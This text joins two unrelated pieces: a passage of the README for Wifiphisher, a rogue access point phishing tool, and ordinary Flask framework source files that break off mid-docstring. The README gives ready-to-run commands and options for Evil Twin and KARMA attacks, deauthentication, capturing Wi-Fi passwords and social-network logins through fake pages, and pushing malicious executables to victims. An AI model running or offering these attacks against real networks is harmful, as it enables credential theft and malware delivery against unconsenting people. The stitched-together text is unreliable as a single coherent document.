research. Attacks like "Known Beacons" and "Lure10" as well as state-of-the-art phishing techniques, were disclosed by our developers, and Wifiphisher was the first tool to incorporate them. * ...supported by an awesome community of developers and users. * ...free. Wifiphisher is available for free download, and also comes with full source code that you may study, change, or distribute under the terms of the GPLv3 license. ## Sponsors Wifiphisher is free (as in speech, and as in beer) and will always be. Continuous development of the project would not be possible without our sponsors and supporters: <a href="https://www.tines.com/?utm_source=oss&utm_medium=sponsorship&utm_campaign=wifiphisher"><p align="center"><a href="https://www.tines.com/?utm_source=oss&utm_medium=sponsorship&utm_campaign=wifiphisher"><img src="https://wifiphisher.github.io/wifiphisher/tines_logo.png" /></a></p></a> ## How it works Wi-Fi phishing consists of two steps: 1. The first step involves the process of associating with Wi-Fi clients unknowingly, or in other words, obtaining a man-in-the-middle (MITM) position. Wifiphisher uses a number of different techniques to achieve this including: * Evil Twin, where Wifiphisher creates a fake wireless network that looks similar to a legitimate network. * KARMA, where Wifiphisher masquerades as a public network searched for by nearby Wi-Fi clients. * Known Beacons, where Wifiphisher broadcasts a dictionary of common ESSIDs, that the around wireless stations have likely connected to in the past. At the same time, Wifiphisher keeps forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations and eventually lure victims using the above techniques. <p align="center"><img width="70%" src="https://wifiphisher.github.io/wifiphisher/diagram.jpg" /><br /><i>Performing MiTM attack</i></p> 2. (Optionally) There are a number of different attacks that can be carried out once Wifiphisher grants the penetration tester with a man-in-the-middle position. For example, the tester may perform data sniffing or scan the victim stations for vulnerabilities. Using Wifiphisher, advanced web phishing techniques are possible by gathering information from the target environment and victim user. For example, in one of our scenarios, Wifiphisher will extract information from the broadcasted beacon frames and the HTTP User-Agent header to display a web-based imitation of Windows network manager in order to capture the Pre-Shared Key. <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss-webphishing.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/wifi_connect/">web-based network manager</a></i></p> ## Requirements Following are the requirements for getting the most out of Wifiphisher: - A working Linux system. People have made Wifiphisher work on many distros, but Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform. - One wireless network adapter that supports AP & Monitor mode and is capable of injection. Drivers should support netlink. ## Installation To install the latest development version type the following commands: ```bash git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision cd wifiphisher # Switch to tool's directory sudo python setup.py install # Install any dependencies ``` Alternatively, you can download the latest stable version from the <a href="https://github.com/wifiphisher/wifiphisher/releases">Releases page</a>. ## Usage Run the tool by typing `wifiphisher` or `python bin/wifiphisher` (from inside the tool's directory). By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the around area) as well as a phishing scenario to perform. By default, the tool will perform both Evil Twin and KARMA attacks. *** ```shell wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap ``` Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario. Verify that the captured Pre-Shared Key is correct by checking it against the handshake in the handshake.pcap file. Useful for manually selecting the wireless adapters. The <a href="https://wifiphisher.org/ps/firmware-upgrade/">"Firmware Upgrade"</a> scenario is an easy way for obtaining the PSK from a password-protected network. *** ```shell wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd ``` Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd". Useful against networks with disclosed PSKs (e.g. in conferences). The <a href="https://wifiphisher.org/ps/plugin_update/">"Plugin Update"</a> scenario provides an easy way for getting the victims to download malicious executables (e.g. malwares containing a reverse shell payload). *** ```shell wifiphisher --essid "FREE WI-FI" -p oauth-login -kB ``` Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario. Furthermore, mount the "Known Beacons" Wi-Fi automatic association technique. Useful against victims in public areas. The <a href="https://wifiphisher.org/ps/oauth-login/">"OAuth Login"</a> scenario provides a simple way for capturing credentials from social networks, like Facebook. Following are all the options along with their descriptions (also available with `wifiphisher -h`): | Short form | Long form | Explanation | | :----------: | :---------: | :-----------: | |-h | --help| show this help message and exit | |-i INTERFACE| --interface INTERFACE| Manually choose an interface that supports both AP and monitor modes for spawning the rogue AP as well as mounting additional Wi-Fi attacks from Extensions (i.e. deauth). Example: -i wlan1 | |-eI EXTENSIONSINTERFACE| --extensionsinterface EXTENSIONSINTERFACE| Manually choose an interface that supports monitor mode for running the extensions. Example: -eI wlan1| |-aI APINTERFACE| --apinterface APINTERFACE| Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0| |-pI INTERFACE| --protectinterface INTERFACE| Specify one or more interfaces that will have their connection protected from being managed by NetworkManager.| |-kN| --keepnetworkmanager| Do not kill NetworkManager.| |-nE| --noextensions| Do not load any extensions.| |-e ESSID| --essid ESSID| Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi'| |-pPD PHISHING_PAGES_DIRECTORY|--phishing-pages-directory PHISHING_PAGES_DIRECTORY| Search for phishing pages in this location| |-p PHISHINGSCENARIO| --phishingscenario PHISHINGSCENARIO |Choose the phishing scenario to run.This option will skip the scenario selection phase. Example: -p firmware_upgrade| |-pK PRESHAREDKEY| --presharedkey PRESHAREDKEY| Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd| |-qS| --quitonsuccess| Stop the script after successfully retrieving one pair of credentials.| |-lC| --lure10-capture| Capture the BSSIDs of the APs that are discovered during AP selection phase. This option is part of Lure10 attack. |-lE LURE10_EXPLOIT |--lure10-exploit LURE10_EXPLOIT| Fool the Windows Location Service of nearby Windows users to believe it is within an area that was previously captured with --lure10-capture. Part of the Lure10 attack.| |-iAM| --mac-ap-interface| Specify the MAC address of the AP interface. Example: -iAM 38:EC:11:00:00:00| |-iEM| --mac-extensions-interface| Specify the MAC address of the extensions interface. Example: -iEM E8:2A:EA:00:00:00| |-iNM| --no-mac-randomization| Do not change any MAC address.| |-hC|--handshake-capture|Capture of the WPA/WPA2 handshakes for verifying passphrase. Requires cowpatty. Example: -hC capture.pcap| |-dE ESSID|--deauth-essid ESSID|Deauth all the BSSIDs in the WLAN with that ESSID.| |-dC CHANNELS| --deauth-channels CHANNELS|Channels to deauth. Example: --deauth-channels 1,3,7| ||--logging| Enable logging. Output will be saved to wifiphisher.log file.| |-lP LOGPATH| --logpath LOGPATH| Determine the full path of the logfile.| |-cP CREDENTIAL_LOG_PATH|--credential-log-path CREDENTIAL_LOG_PATH|Determine the full path of the file that will store any captured credentials| |-cM|--channel-monitor|Monitor if the target access point changes the channel.| ||--payload-path| Enable the payload path. Intended for use with scenarios that serve payloads.| |-wP|--wps-pbc|Monitor if the button on a WPS-PBC Registrar side is pressed.| |-wAI|--wpspbc-assoc-interface|The WLAN interface used for associating to the WPS AccessPoint.| |-kB|--known-beacons|Perform the known beacons Wi-Fi automatic association technique.| |-fH|--force-hostapd|Force the usage of hostapd installed in the system.| ||--dnsmasq-conf DNSMASQ_CONF|Determine the full path of dnmasq.conf file.| |-dK|--disable-karma|Disables KARMA attack.| |-pE|--phishing-essid|Determine the ESSID you want to use for the phishing page.| ## Screenshots <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss5.png" /><br /><i>Targeting an access point</i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss2.png" /><br /><i>A successful attack</i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss7.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/firmware-upgrade/">router configuration page</a></i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss6.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/oauth-login/">OAuth Login Page</a></i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss4.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/wifi_connect/">web-based network manager</a></i></p> ## Help needed If you are a Python developer or a web designer you can help us improve Wifiphisher. Feel free to take a look at the <a href="https://github.com/wifiphisher/wifiphisher/issues">bug tracker</a> for some tasks to do. If you don't know how to code, you can help us by <a href="https://github.com/wifiphisher/wifiphisher/issues">proposing improvements or reporting bugs</a>. Please have a look at the Bug Reporting Guidelines and the <a href="https://wifiphisher.readthedocs.io/en/latest/faq.html">FAQ document</a> beforehand. Note that the tool does not aim to be script-kiddie friendly. Make sure you do understand how the tool works before opening an issue. ## Credits The script is based on an idea from <a href="https://github.com/DanMcInerney">Dan McInerney</a> back in 2015. A full list of contributors lies <a href="https://github.com/wifiphisher/wifiphisher/graphs/contributors">here</a>. ## License Wifiphisher is licensed under the GPLv3 license. See [LICENSE](LICENSE) for more information. ## Project Status Wifiphisher's current version is **1.4**. You can download the latest release from <a href="https://github.com/wifiphisher/wifiphisher/releases/tag/v1.4">here</a>. Otherwise you can get the latest development version by cloning this repository. ## Disclaimer * Usage of Wifiphisher for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. <b>Note</b>: Be aware of sites pretending to be related with the Wifiphisher Project. They may be delivering malware. For Wifiphisher news, follow us on <a href="https://www.twitter.com/wifiphisher">Twitter</a> or like us on <a href="https://www.facebook.com/Wifiphisher-129914317622032/">Facebook</a>.
flask
2fec0b206c6e83ea813ab26597e15c96fab08be7
File: docs/conf.py import packaging.version from pallets_sphinx_themes import get_version from pallets_sphinx_themes import ProjectLink # Project -------------------------------------------------------------- project = "Flask" copyright = "2010 Pallets" author = "Pallets" release, version = get_version("Flask") # General -------------------------------------------------------------- default_role = "code" extensions = [ "sphinx.ext.autodoc", "sphinx.ext.extlinks", "sphinx.ext.intersphinx", "sphinxcontrib.log_cabinet", "sphinx_tabs.tabs", "pallets_sphinx_themes", ] autodoc_member_order = "bysource" autodoc_typehints = "description" autodoc_preserve_defaults = True extlinks = { "issue": ("https://github.com/pallets/flask/issues/%s", "#%s"), "pr": ("https://github.com/pallets/flask/pull/%s", "#%s"), } intersphinx_mapping = { "python": ("https://docs.python.org/3/", None), "werkzeug": ("https://werkzeug.palletsprojects.com/", None), "click": ("https://click.palletsprojects.com/", None), "jinja": ("https://jinja.palletsprojects.com/", None), "itsdangerous": ("https://itsdangerous.palletsprojects.com/", None), "sqlalchemy": ("https://docs.sqlalchemy.org/", None), "wtforms": ("https://wtforms.readthedocs.io/", None), "blinker": ("https://blinker.readthedocs.io/", None), } # HTML ----------------------------------------------------------------- html_theme = "flask" html_theme_options = {"index_sidebar_logo": False} html_context = { "project_links": [ ProjectLink("Donate", "https://palletsprojects.com/donate"), ProjectLink("PyPI Releases", "https://pypi.org/project/Flask/"), ProjectLink("Source Code", "https://github.com/pallets/flask/"), ProjectLink("Issue Tracker", "https://github.com/pallets/flask/issues/"), ProjectLink("Chat", "https://discord.gg/pallets"), ] } html_sidebars = { "index": ["project.html", "localtoc.html", "searchbox.html", "ethicalads.html"], "**": ["localtoc.html", "relations.html", "searchbox.html", "ethicalads.html"], } singlehtml_sidebars = {"index": ["project.html", "localtoc.html", "ethicalads.html"]} html_static_path = ["_static"] html_favicon = "_static/shortcut-icon.png" html_logo = "_static/flask-vertical.png" html_title = f"Flask Documentation ({version})" html_show_sourcelink = False # Local Extensions ----------------------------------------------------- def github_link(name, rawtext, text, lineno, inliner, options=None, content=None): app = inliner.document.settings.env.app release = app.config.release base_url = "https://github.com/pallets/flask/tree/" if text.endswith(">"): words, text = text[:-1].rsplit("<", 1) words = words.strip() else: words = None if packaging.version.parse(release).is_devrelease: url = f"{base_url}main/{text}" else: url = f"{base_url}{release}/{text}" if words is None: words = url from docutils.nodes import reference from docutils.parsers.rst.roles import set_classes options = options or {} set_classes(options) node = reference(rawtext, words, refuri=url, **options) return [node], [] def setup(app): app.add_role("gh", github_link) File: src/flask/logging.py from __future__ import annotations import logging import sys import typing as t from werkzeug.local import LocalProxy from .globals import request if t.TYPE_CHECKING: # pragma: no cover from .sansio.app import App @LocalProxy def wsgi_errors_stream() -> t.TextIO: """Find the most appropriate error stream for the application. If a request is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``. If you configure your own :class:`logging.StreamHandler`, you may want to use this for the stream. If you are using file or dict configuration and can't import this directly, you can refer to it as ``ext://flask.logging.wsgi_errors_stream``. """ if request: return request.environ["wsgi.errors"] # type: ignore[no-any-return] return sys.stderr def has_level_handler(logger: logging.Logger) -> bool: """Check if there is a handler in the logging chain that will handle the given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`. """ level = logger.getEffectiveLevel() current = logger while current: if any(handler.level <= level for handler in current.handlers): return True if not current.propagate: break current = current.parent # type: ignore return False #: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format #: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``. default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore default_handler.setFormatter( logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s") ) def create_logger(app: App) -> logging.Logger: """Get the Flask app's logger and configure it if needed. The logger name will be the same as :attr:`app.import_name <flask.Flask.name>`. When :attr:`~flask.Flask.debug` is enabled, set the logger level to :data:`logging.DEBUG` if it is not set. If there is no handler for the logger's effective level, add a :class:`~logging.StreamHandler` for :func:`~flask.logging.wsgi_errors_stream` with a basic format. """ logger = logging.getLogger(app.name) if app.debug and not logger.level: logger.setLevel(logging.DEBUG) if not has_level_handler(logger): logger.addHandler(default_handler) return logger File: src/flask/signals.py from __future__ import annotations from blinker import Namespace # This namespace is only for signals provided by Flask itself. _signals = Namespace() template_rendered = _signals.signal("template-rendered") before_render_template = _signals.signal("before-render-template") request_started = _signals.signal("request-started") request_finished = _signals.signal("request-finished") request_tearing_down = _signals.signal("request-tearing-down") got_request_exception = _signals.signal("got-request-exception") appcontext_tearing_down = _signals.signal("appcontext-tearing-down") appcontext_pushed = _signals.signal("appcontext-pushed") appcontext_popped = _signals.signal("appcontext-popped") message_flashed = _signals.signal("message-flashed") File: src/flask/sessions.py from __future__ import annotations import hashlib import typing as t from collections.abc import MutableMapping from datetime import datetime from datetime import timezone from itsdangerous import BadSignature from itsdangerous import URLSafeTimedSerializer from werkzeug.datastructures import CallbackDict from .json.tag import TaggedJSONSerializer if t.TYPE_CHECKING: # pragma: no cover import typing_extensions as te from .app import Flask from .wrappers import Request from .wrappers import Response # TODO generic when Python > 3.8 class SessionMixin(MutableMapping): # type: ignore[type-arg] """Expands a basic dictionary with session attributes.""" @property def permanent(self) -> bool: """This reflects the ``'_permanent'`` key in the dict.""" return self.get("_permanent", False) @permanent.setter def permanent(self, value: bool) -> None: self["_permanent"] = bool(value) #: Some implementations can detect whether a session is newly #: created, but that is not guaranteed. Use with caution. The mixin # default is hard-coded ``False``. new = False #: Some implementations can detect changes to the session and set #: this when that happens. The mixin default is hard coded to #: ``True``. modified = True #: Some implementations can detect when session data is read or #: written and set this when that happens. The mixin default is hard #: coded to ``True``. accessed = True # TODO generic when Python > 3.8 class SecureCookieSession(CallbackDict, SessionMixin): # type: ignore[type-arg] """Base class for sessions based on signed cookies. This session backend will set the :attr:`modified` and :attr:`accessed` attributes. It cannot reliably track whether a session is new (vs. empty), so :attr:`new` remains hard coded to ``False``. """ #: When data is changed, this is set to ``True``. Only the session #: dictionary itself is tracked; if the session contains mutable #: data (for example a nested dict) then this must be set to #: ``True`` manually when modifying that data. The session cookie #: will only be written to the response if this is ``True``. modified = False #: When data is read or written, this is set to ``True``. Used by # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` #: header, which allows caching proxies to cache different pages for #: different users. accessed = False def __init__(self, initial: t.Any = None) -> None: def on_update(self: te.Self) -> None: self.modified = True self.accessed = True super().__init__(initial, on_update) def __getitem__(self, key: str) -> t.Any: self.accessed = True return super().__getitem__(key) def get(self, key: str, default: t.Any = None) -> t.Any: self.accessed = True return super().get(key, default) def setdefault(self, key: str, default: t.Any = None) -> t.Any: self.accessed = True return super().setdefault(key, default) class NullSession(SecureCookieSession): """Class used to generate nicer error messages if sessions are not available. Will still allow read-only access to the empty session but fail on setting. """ def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: raise RuntimeError( "The session is unavailable because no secret " "key was set. Set the secret_key on the " "application to something unique and secret." ) __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail # type: ignore # noqa: B950 del _fail class SessionInterface: """The basic interface you have to implement in order to replace the default session interface which uses werkzeug's securecookie implementation. The only methods you have to implement are :meth:`open_session` and :meth:`save_session`, the others have useful defaults which you don't need to change. The session object returned by the :meth:`open_session` method has to provide a dictionary like interface plus the properties and methods from the :class:`SessionMixin`. We recommend just subclassing a dict and adding that mixin:: class Session(dict, SessionMixin): pass If :meth:`open_session` returns ``None`` Flask will call into :meth:`make_null_session` to create a session that acts as replacement if the session support cannot work because some requirement is not fulfilled. The default :class:`NullSession` class that is created will complain that the secret key was not set. To replace the session interface on an application all you have to do is to assign :attr:`flask.Flask.session_interface`:: app = Flask(__name__) app.session_interface = MySessionInterface() Multiple requests with the same session may be sent and handled concurrently. When implementing a new session interface, consider whether reads or writes to the backing store must be synchronized. There is no guarantee on the order in which the session for each request is opened or saved, it will occur in the order that requests begin and end processing. .. versionadded:: 0.8 """ #: :meth:`make_null_session` will look here for the class that should #: be created when a null session is requested. Likewise the #: :meth:`is_null_session` method will perform a typecheck against #: this type. null_session_class = NullSession #: A flag that indicates if the session interface is pickle based. #: This can be used by Flask extensions to make a decision in regards #: to how to deal with the session object. #: #: .. versionadded:: 0.10 pickle_based = False def make_null_session(self, app: Flask) -> NullSession: """Creates a null session which acts as a replacement object if the real session support could not be loaded due to a configuration error. This mainly aids the user experience because the job of the null session is to still support lookup without complaining but modifications are answered with a helpful error message of what failed. This creates an instance of :attr:`null_session_class` by default. """ return self.null_session_class() def is_null_session(self, obj: object) -> bool: """Checks if a given object is a null session. Null sessions are not asked to be saved. This checks if the object is an instance of :attr:`null_session_class` by default. """ return isinstance(obj, self.null_session_class) def get_cookie_name(self, app: Flask) -> str: """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``.""" return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return] def get_cookie_domain(self, app: Flask) -> str | None: """The value of the ``Domain`` parameter on the session cookie. If not set, browsers will only send the cookie to the exact domain it was set from. Otherwise, they will send it to any subdomain of the given value as well. Uses the :data:`SESSION_COOKIE_DOMAIN` config. .. versionchanged:: 2.3 Not set by default, does not fall back to ``SERVER_NAME``. """ return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return] def get_cookie_path(self, app: Flask) -> str: """Returns the path for which the cookie should be valid. The default implementation uses the value from the ``SESSION_COOKIE_PATH`` config var if it's set, and falls back to ``APPLICATION_ROOT`` or uses ``/`` if it's ``None``. """ return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return] def get_cookie_httponly(self, app: Flask) -> bool: """Returns True if the session cookie should be httponly. This currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` config var. """ return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return] def get_cookie_secure(self, app: Flask) -> bool: """Returns True if the cookie should be secure. This currently just returns the value of the ``SESSION_COOKIE_SECURE`` setting. """ return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return] def get_cookie_samesite(self, app: Flask) -> str | None: """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the ``SameSite`` attribute. This currently just returns the value of the :data:`SESSION_COOKIE_SAMESITE` setting. """ return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return] def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None: """A helper method that returns an expiration date for the session or ``None`` if the session is linked to the browser session. The default implementation returns now + the permanent session lifetime configured on the application. """ if session.permanent: return datetime.now(timezone.utc) + app.permanent_session_lifetime return None def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool: """Used by session backends to determine if a ``Set-Cookie`` header should be set for this session cookie for this response. If the session has been modified, the cookie is set. If the session is permanent and the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is always set. This check is usually skipped if the session was deleted. .. versionadded:: 0.11 """ return session.modified or ( session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] ) def open_session(self, app: Flask, request: Request) -> SessionMixin | None: """This is called at the beginning of each request, after pushing the request context, before matching the URL. This must return an object which implements a dictionary-like interface as well as the :class:`SessionMixin` interface. This will return ``None`` to indicate that loading failed in some way that is not immediately an error. The request context will fall back to using :meth:`make_null_session` in this case. """ raise NotImplementedError() def save_session( self, app: Flask, session: SessionMixin, response: Response ) -> None: """This is called at the end of each request, after generating a response, before removing the request context. It is skipped if :meth:`is_null_session` returns ``True``. """ raise NotImplementedError() session_json_serializer = TaggedJSONSerializer() def _lazy_sha1(string: bytes = b"") -> t.Any: """Don't access ``hashlib.sha1`` until runtime. FIPS builds may not include SHA-1, in which case the import and use as a default would fail before the developer can configure something else. """ return hashlib.sha1(string) class SecureCookieSessionInterface(SessionInterface): """The default session interface that stores sessions in signed cookies through the :mod:`itsdangerous` module. """ #: the salt that should be applied on top of the secret key for the #: signing of cookie based sessions. salt = "cookie-session" #: the hash function to use for the signature. The default is sha1 digest_method = staticmethod(_lazy_sha1) #: the name of the itsdangerous supported key derivation. The default #: is hmac. key_derivation = "hmac" #: A python serializer for the payload. The default is a compact #: JSON derived serializer with support for some extra Python types #: such as datetime objects or tuples. serializer = session_json_serializer session_class = SecureCookieSession def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None: if not app.secret_key: return None signer_kwargs = dict( key_derivation=self.key_derivation, digest_method=self.digest_method ) return URLSafeTimedSerializer( app.secret_key, salt=self.salt, serializer=self.serializer, signer_kwargs=signer_kwargs, ) def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None: s = self.get_signing_serializer(app) if s is None: return None val = request.cookies.get(self.get_cookie_name(app)) if not val: return self.session_class() max_age = int(app.permanent_session_lifetime.total_seconds()) try: data = s.loads(val, max_age=max_age) return self.session_class(data) except BadSignature: return self.session_class() def save_session( self, app: Flask, session: SessionMixin, response: Response ) -> None: name = self.get_cookie_name(app) domain = self.get_cookie_domain(app) path = self.get_cookie_path(app) secure = self.get_cookie_secure(app) samesite = self.get_cookie_samesite(app) httponly = self.get_cookie_httponly(app) # Add a "Vary: Cookie" header if the session was accessed at all. if session.accessed: response.vary.add("Cookie") # If the session is modified to be empty, remove the cookie. # If the session is empty, return without setting the cookie. if not session: if session.modified: response.delete_cookie( name, domain=domain, path=path, secure=secure, samesite=samesite, httponly=httponly, ) response.vary.add("Cookie") return if not self.should_set_cookie(app, session): return expires = self.get_expiration_time(app, session) val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore[union-attr] response.set_cookie( name, val, expires=expires, httponly=httponly, domain=domain, path=path, secure=secure, samesite=samesite, ) response.vary.add("Cookie") File: src/flask/config.py from __future__ import annotations import errno import json import os import types import typing as t from werkzeug.utils import import_string if t.TYPE_CHECKING: import typing_extensions as te from .sansio.app import App T = t.TypeVar("T") class ConfigAttribute(t.Generic[T]): """Makes an attribute forward to the config""" def __init__( self, name: str, get_converter: t.Callable[[t.Any], T] | None = None ) -> None: self.__name__ = name self.get_converter = get_converter @t.overload def __get__(self, obj: None, owner: None) -> te.Self: ... @t.overload def __get__(self, obj: App, owner: type[App]) -> T: ... def __get__(self, obj: App | None, owner: type[App] | None = None) -> T | te.Self: if obj is None: return self rv = obj.config[self.__name__] if self.get_converter is not None: rv = self.get_converter(rv) return rv # type: ignore[no-any-return] def __set__(self, obj: App, value: t.Any) -> None: obj.config[self.__name__] = value class Config(dict): # type: ignore[type-arg] """Works exactly like a dict but provides ways to fill it from files or special dictionaries. There are two common patterns to populate the config. Either you can fill the config from a config file:: app.config.from_pyfile('yourconfig.cfg') Or alternatively you can define the configuration options in the module that calls :meth:`from_object` or provide an import path to a module that should be loaded. It is also possible to tell it to use the same module and with that provide the configuration values just before the call:: DEBUG = True SECRET_KEY = 'development key' app.config.from_object(__name__) In both cases (loading from any Python file or loading from modules), only uppercase keys are added to the config. This makes it possible to use lowercase values in the config file for temporary values that are not added to the config or to define the config keys in the same file that implements the application. Probably the most interesting way to load configurations is from an environment variable pointing to a file:: app.config.from_envvar('YOURAPPLICATION_SETTINGS') In this case before launching the application you have to set this environment variable to the file you want to use. On Linux and OS X use the export statement:: export YOURAPPLICATION_SETTINGS='/path/to/config/file' On windows use `set` instead. :param root_path: path to which files are read relative from. When the config object is created by the application, this is the application's :attr:`~flask.Flask.root_path`. :param defaults: an optional dictionary of default values """ def __init__( self, root_path: str | os.PathLike[str], defaults: dict[str, t.Any] | None = None, ) -> None: super().__init__(defaults or {}) self.root_path = root_path def from_envvar(self, variable_name: str, silent: bool = False) -> bool: """Loads a configuration from an environment variable pointing to a configuration file. This is basically just a shortcut with nicer error messages for this line of code:: app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS']) :param variable_name: name of the environment variable :param silent: set to ``True`` if you want silent failure for missing files. :return: ``True`` if the file was loaded successfully. """ rv = os.environ.get(variable_name) if not rv: if silent: return False raise RuntimeError( f"The environment variable {variable_name!r} is not set" " and as such configuration could not be loaded. Set" " this variable and make it point to a configuration" " file" ) return self.from_pyfile(rv, silent=silent) def from_prefixed_env( self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads ) -> bool: """Load any environment variables that start with ``FLASK_``, dropping the prefix from the env key for the config key. Values are passed through a loading function to attempt to convert them to more specific types than strings. Keys are loaded in :func:`sorted` order. The default loading function attempts to parse values as any valid JSON type, including dicts and lists. Specific items in nested dicts can be set by separating the keys with double underscores (``__``). If an intermediate key doesn't exist, it will be initialized to an empty dict. :param prefix: Load env vars that start with this prefix, separated with an underscore (``_``). :param loads: Pass each string value to this function and use the returned value as the config value. If any error is raised it is ignored and the value remains a string. The default is :func:`json.loads`. .. versionadded:: 2.1 """ prefix = f"{prefix}_" len_prefix = len(prefix) for key in sorted(os.environ): if not key.startswith(prefix): continue value = os.environ[key] try: value = loads(value) except Exception: # Keep the value as a string if loading failed. pass # Change to key.removeprefix(prefix) on Python >= 3.9. key = key[len_prefix:] if "__" not in key: # A non-nested key, set directly. self[key] = value continue # Traverse nested dictionaries with keys separated by "__". current = self *parts, tail = key.split("__") for part in parts: # If an intermediate dict does not exist, create it. if part not in current: current[part] = {} current = current[part] current[tail] = value return True def from_pyfile( self, filename: str | os.PathLike[str], silent: bool = False ) -> bool: """Updates the values in the config from a Python file. This function behaves as if the file was imported as module with the :meth:`from_object` function. :param filename: the filename of the config. This can either be an absolute filename or a filename relative to the root path. :param silent: set to ``True`` if you want silent failure for missing files. :return: ``True`` if the file was loaded successfully. .. versionadded:: 0.7 `silent` parameter. """ filename = os.path.join(self.root_path, filename) d = types.ModuleType("config") d.__file__ = filename try: with open(filename, mode="rb") as config_file: exec(compile(config_file.read(), filename, "exec"), d.__dict__) except OSError as e: if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR): return False e.strerror = f"Unable to load configuration file ({e.strerror})" raise self.from_object(d) return True def from_object(self, obj: object | str) -> None: """Updates the values from the given object. An object can be of one of the following two types: - a string: in this case the object with that name will be imported - an actual object reference: that object is used directly Objects are usually either modules or classes. :meth:`from_object` loads only the uppercase attributes of the module/class. A ``dict`` object will not work with :meth:`from_object` because the keys of a ``dict`` are not attributes of the ``dict`` class. Example of module-based configuration:: app.config.from_object('yourapplication.default_config') from yourapplication import default_config app.config.from_object(default_config) Nothing is done to the object before loading. If the object is a class and has ``@property`` attributes, it needs to be instantiated before being passed to this method. You should not use this function to load the actual configuration but rather configuration defaults. The actual config should be loaded with :meth:`from_pyfile` and ideally from a location not within the package because the package might be installed system wide. See :ref:`config-dev-prod` for an example of class-based configuration using :meth:`from_object`. :param obj: an import name or object """ if isinstance(obj, str): obj = import_string(obj) for key in dir(obj): if key.isupper(): self[key] = getattr(obj, key) def from_file( self, filename: str | os.PathLike[str], load: t.Callable[[t.IO[t.Any]], t.Mapping[str, t.Any]], silent: bool = False, text: bool = True, ) -> bool: """Update the values in the config from a file that is loaded using the ``load`` parameter. The loaded data is passed to the :meth:`from_mapping` method. .. code-block:: python import json app.config.from_file("config.json", load=json.load) import tomllib app.config.from_file("config.toml", load=tomllib.load, text=False) :param filename: The path to the data file. This can be an absolute path or relative to the config root path. :param load: A callable that takes a file handle and returns a mapping of loaded data from the file. :type load: ``Callable[[Reader], Mapping]`` where ``Reader`` implements a ``read`` method. :param silent: Ignore the file if it doesn't exist. :param text: Open the file in text or binary mode. :return: ``True`` if the file was loaded successfully. .. versionchanged:: 2.3 The ``text`` parameter was added. .. versionadded:: 2.0 """ filename = os.path.join(self.root_path, filename) try: with open(filename, "r" if text else "rb") as f: obj = load(f) except OSError as e: if silent and e.errno in (errno.ENOENT, errno.EISDIR): return False e.strerror = f"Unable to load configuration file ({e.strerror})" raise return self.from_mapping(obj) def from_mapping( self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any ) -> bool: """Updates the config like :meth:`update` ignoring items with non-upper keys. :return: Always returns ``True``. .. versionadded:: 0.11 """ mappings: dict[str, t.Any] = {} if mapping is not None: mappings.update(mapping) mappings.update(kwargs) for key, value in mappings.items(): if key.isupper(): self[key] = value return True def get_namespace( self, namespace: str, lowercase: bool = True, trim_namespace: bool = True ) -> dict[str, t.Any]: """Returns a dictionary containing a subset of configuration options that match the specified namespace/prefix. Example usage:: app.config['IMAGE_STORE_TYPE'] = 'fs' app.config['IMAGE_STORE_PATH'] = '/var/app/images' 